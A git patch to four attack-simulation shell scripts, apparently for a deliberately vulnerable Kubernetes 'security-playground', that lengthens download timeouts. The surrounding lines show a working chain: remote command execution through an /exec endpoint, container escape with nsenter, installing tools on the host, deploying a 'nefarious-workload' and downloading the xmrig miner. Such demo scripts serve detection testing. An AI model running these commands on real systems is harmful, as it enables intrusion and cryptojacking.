From 335a3eacaaf10493217072355a6d1b03cba631e4 Mon Sep 17 00:00:00 2001 From: Jason Umiker Date: Mon, 29 Apr 2024 17:07:43 +1000 Subject: [PATCH] Extended timeout --- scripts/example-curls-restricted-nodrift.sh | 9 ++++++--- scripts/example-curls-restricted-nomalware.sh | 9 ++++++--- scripts/example-curls-restricted.sh | 9 ++++++--- scripts/example-curls.sh | 9 ++++++--- 4 files changed, 24 insertions(+), 12 deletions(-) diff --git a/scripts/example-curls-restricted-nodrift.sh b/scripts/example-curls-restricted-nodrift.sh index 976a2f8..18629a3 100755 --- a/scripts/example-curls-restricted-nodrift.sh +++ b/scripts/example-curls-restricted-nodrift.sh @@ -47,7 +47,7 @@ echo "-------------------------------------------------------------------------- ARCH=$(curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture') echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.29.0/crictl-v1.29.0-linux-$ARCH.tar.gz\"" echo "---" -curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget --timeout=5 --tries=1 -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.29.0/crictl-v1.29.0-linux-$ARCH.tar.gz" +curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget --timeout=15 --tries=1 -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.29.0/crictl-v1.29.0-linux-$ARCH.tar.gz" echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=nsenter --all --target=1 tar -zxvf crictl-v1.29.0-linux-$ARCH.tar.gz -C /usr/bin\"" echo "---" curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.29.0-linux-$ARCH.tar.gz -C /usr/bin" @@ -90,6 +90,9 @@ echo "---" echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'" echo "---" curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl' +echo "---" +echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'" +echo "---" curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:240324' curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods' echo "--------------------------------------------------------------------------------" @@ -108,11 +111,11 @@ echo "-------------------------------------------------------------------------- if [[ "$ARCH" == "amd64" ]]; then echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz\"" echo "---" - curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=5 --tries=1 https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz" + curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=15 --tries=1 https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz" else echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz\"" echo "---" - curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=5 --tries=1 https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz" + curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=15 --tries=1 https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz" fi echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'" echo "---" diff --git a/scripts/example-curls-restricted-nomalware.sh b/scripts/example-curls-restricted-nomalware.sh index a8db2c4..5e15b28 100755 --- a/scripts/example-curls-restricted-nomalware.sh +++ b/scripts/example-curls-restricted-nomalware.sh @@ -47,7 +47,7 @@ echo "-------------------------------------------------------------------------- ARCH=$(curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture') echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.29.0/crictl-v1.29.0-linux-$ARCH.tar.gz\"" echo "---" -curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget --timeout=5 --tries=1 -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.29.0/crictl-v1.29.0-linux-$ARCH.tar.gz" +curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget --timeout=15 --tries=1 -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.29.0/crictl-v1.29.0-linux-$ARCH.tar.gz" echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=nsenter --all --target=1 tar -zxvf crictl-v1.29.0-linux-$ARCH.tar.gz -C /usr/bin\"" echo "---" curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.29.0-linux-$ARCH.tar.gz -C /usr/bin" @@ -90,6 +90,9 @@ echo "---" echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'" echo "---" curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl' +echo "---" +echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'" +echo "---" curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:240324' curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods' echo "--------------------------------------------------------------------------------" @@ -108,11 +111,11 @@ echo "-------------------------------------------------------------------------- if [[ "$ARCH" == "amd64" ]]; then echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz\"" echo "---" - curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=5 --tries=1 https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz" + curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=15 --tries=1 https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz" else echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz\"" echo "---" - curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=5 --tries=1 https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz" + curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=15 --tries=1 https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz" fi echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'" echo "---" diff --git a/scripts/example-curls-restricted.sh b/scripts/example-curls-restricted.sh index df15d96..f952410 100755 --- a/scripts/example-curls-restricted.sh +++ b/scripts/example-curls-restricted.sh @@ -47,7 +47,7 @@ echo "-------------------------------------------------------------------------- ARCH=$(curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture') echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.29.0/crictl-v1.29.0-linux-$ARCH.tar.gz\"" echo "---" -curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget --timeout=5 --tries=1 -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.29.0/crictl-v1.29.0-linux-$ARCH.tar.gz" +curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget --timeout=15 --tries=1 -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.29.0/crictl-v1.29.0-linux-$ARCH.tar.gz" echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=nsenter --all --target=1 tar -zxvf crictl-v1.29.0-linux-$ARCH.tar.gz -C /usr/bin\"" echo "---" curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.29.0-linux-$ARCH.tar.gz -C /usr/bin" @@ -90,6 +90,9 @@ echo "---" echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'" echo "---" curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl' +echo "---" +echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'" +echo "---" curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:240324' curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods' echo "--------------------------------------------------------------------------------" @@ -108,11 +111,11 @@ echo "-------------------------------------------------------------------------- if [[ "$ARCH" == "amd64" ]]; then echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz\"" echo "---" - curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=5 --tries=1 https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz" + curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=15 --tries=1 https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz" else echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz\"" echo "---" - curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=5 --tries=1 https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz" + curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=15 --tries=1 https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz" fi echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'" echo "---" diff --git a/scripts/example-curls.sh b/scripts/example-curls.sh index 05e9baf..22b7b22 100755 --- a/scripts/example-curls.sh +++ b/scripts/example-curls.sh @@ -47,7 +47,7 @@ echo "-------------------------------------------------------------------------- ARCH=$(curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=dpkg --print-architecture') echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=nsenter --all --target=1 wget -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.29.0/crictl-v1.29.0-linux-$ARCH.tar.gz\"" echo "---" -curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget --timeout=5 --tries=1 -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.29.0/crictl-v1.29.0-linux-$ARCH.tar.gz" +curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 wget --timeout=15 --tries=1 -q https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.29.0/crictl-v1.29.0-linux-$ARCH.tar.gz" echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=nsenter --all --target=1 tar -zxvf crictl-v1.29.0-linux-$ARCH.tar.gz -C /usr/bin\"" echo "---" curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 tar -zxvf crictl-v1.29.0-linux-$ARCH.tar.gz -C /usr/bin" @@ -90,6 +90,9 @@ echo "---" echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'" echo "---" curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl' +echo "---" +echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'" +echo "---" curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:240324' curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods' echo "--------------------------------------------------------------------------------" @@ -108,11 +111,11 @@ echo "-------------------------------------------------------------------------- if [[ "$ARCH" == "amd64" ]]; then echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=wget https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz\"" echo "---" - curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=5 --tries=1 https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz" + curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=15 --tries=1 https://github.com/xmrig/xmrig/releases/download/v6.20.0/xmrig-6.20.0-linux-static-x64.tar.gz -O xmrig.tar.gz" else echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d \"command=wget https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz\"" echo "---" - curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=5 --tries=1 https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz" + curl --connect-timeout 5 -s -X POST $NODE_IP:$NODE_PORT/exec -d "command=wget --timeout=15 --tries=1 https://z9k65lokhn70.s3.amazonaws.com/xmrig-6.20.0-linux-static-arm64.tar.gz -O xmrig.tar.gz" fi echo "Running curl -s -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'" echo "---"